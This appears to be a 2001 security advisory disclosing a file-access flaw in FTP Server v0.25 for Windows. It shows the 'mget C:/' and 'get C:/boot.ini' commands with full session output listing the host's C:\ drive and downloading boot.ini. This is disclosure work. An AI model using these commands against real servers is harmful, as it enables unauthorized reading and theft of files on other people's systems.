A bug in FTP server v0.25 for Windows 9x/NT has a bug which allows remote users to download and view any file on the system.
910a99610a7baee20dce791605ca8060728ec4d8313637c82ca433e38c3120c8
Andrisk Security Advisory 1# - FTP server v0.25
Topic: FTP Server v.025
Announced: 2001-04-25
Affects: FTP server version 0.25
OS : Win9x/NT
I. Problem Description
**********************
FTP Server 0.25 is an FTP server for Windows 9x/NT. A bug allows any
user download and view any files from remote computer.
II. Impact
**************
When sending the command "mget C:/" then it is possible to view files from C:\
When sending the command "get C:/file [filename]" then it is possible to download current file
Example 1:
--------
ftp> mget
(remote-files) C:/
mget !!?
200 Port command successful.
150 Opening data connection for !!.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\!!
mget AUTOEXEC.BAT?
200 Port command successful.
150 Opening data connection for AUTOEXEC.BAT.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\AUTOEXEC.BAT
mget boot.ini?
200 Port command successful.
150 Opening data connection for boot.ini.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\boot.ini
mget CONFIG.SYS?
200 Port command successful.
150 Opening data connection for CONFIG.SYS.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\CONFIG.SYS
mget ffastun.ffa?
200 Port command successful.
150 Opening data connection for ffastun.ffa.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ffastun.ffa
mget ffastun.ffl?
200 Port command successful.
150 Opening data connection for ffastun.ffl.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ffastun.ffl
mget ffastun.ffo?
200 Port command successful.
150 Opening data connection for ffastun.ffo.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ffastun.ffo
mget ffastun0.ffx?
200 Port command successful.
150 Opening data connection for ffastun0.ffx.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ffastun0.ffx
mget FTP Server?
200 Port command successful.
150 Opening data connection for FTP Server.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\FTP Server
mget IO.SYS?
200 Port command successful.
150 Opening data connection for IO.SYS.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\IO.SYS
mget mirc?
200 Port command successful.
150 Opening data connection for mirc.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\mirc
mget MSDOS.SYS?
200 Port command successful.
150 Opening data connection for MSDOS.SYS.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\MSDOS.SYS
mget NTDETECT.COM?
200 Port command successful.
150 Opening data connection for NTDETECT.COM.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\NTDETECT.COM
mget ntldr?
200 Port command successful.
150 Opening data connection for ntldr.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\ntldr
mget os240905.bin?
200 Port command successful.
150 Opening data connection for os240905.bin.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\os240905.bin
mget os560179.bin?
200 Port command successful.
150 Opening data connection for os560179.bin.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\os560179.bin
mget pagefile.sys?
200 Port command successful.
150 Opening data connection for pagefile.sys.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\pagefile.sys
mget Program Files?
200 Port command successful.
150 Opening data connection for Program Files.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\Program Files
mget rc5?
200 Port command successful.
150 Opening data connection for rc5.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\rc5
mget RECYCLER?
200 Port command successful.
150 Opening data connection for RECYCLER.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\RECYCLER
mget TEMP?
200 Port command successful.
150 Opening data connection for TEMP.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\TEMP
mget WINNT?
200 Port command successful.
150 Opening data connection for WINNT.
501 Cannot RETR. Cannot open file C:\FTP Server\ftproot\WINNT
**************************************************************************************************
Example 2:
ftp> get
(remote-file) C:/boot.ini
(local-file) boot.ini
local: boot.ini remote: C:/boot.ini
200 Port command successful.
150 Opening data connection for C:/boot.ini.
100% |*********************************************************************************| 289 00:00 ETA
226 File sent ok
289 bytes received in 0.00 seconds (84.00 KB/s)
ftp>
III. Solution
*************
At this time, no patch is available yet.
IV. Credits
***********
Bug discovered by Andris K <andris@talsi.teliamtc.lv>
Greets: Mareks M, Dreef (www.lam.yo.lv), coolynx, ParaTr00p